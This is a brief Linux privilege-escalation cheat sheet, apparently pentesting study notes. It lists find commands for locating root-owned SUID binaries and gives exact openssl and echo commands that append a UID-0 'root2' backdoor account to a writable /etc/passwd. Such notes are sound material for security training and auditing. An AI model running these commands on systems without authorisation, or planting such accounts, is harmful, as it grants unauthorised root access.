Enumerating Attack Vectors

Helpful Tools


Processes and Jobs

Kernel and OS

Finding Interesting Files and Directories

Enumerating SUID binaries

SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner. Instead of the normal x which represents execute permissions, you will see an s (to indicate SUID) special permission for the user.

Obviously, for a quick win, you want to find SUID binaries having the root user as the file's owner.

HackTricks has a page where more info about this topic is explained.

You can find SUID binaries in many ways, the following are some example commands:

  • find / -perm -4000 2>/dev/null

  • find / -perm /4000 2>/dev/null

  • find / -perm /u+s 2>/dev/null

  • find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Other Tricks - Miscellaneous

This section contains some specific things which could help you find unusual vectors to escalate your privileges.


Writeable passwd file

Always check whether you have write permissions into the /etc/passwd file.

If that's the case, you can effectively set an arbitrary password for any account.

To check, use ls -la /etc/passwd

Supposing you have write permissions, you can generate a password hash and use it to log as root as follows:

  1. Generate the password hash: openssl passwd w00t output: Fdzt.eqJQ4s0g

  2. Append the password hash inside the passwd file: echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd

  3. Now you can login as root using su root2 and inserting w00t as the user's password

Last updated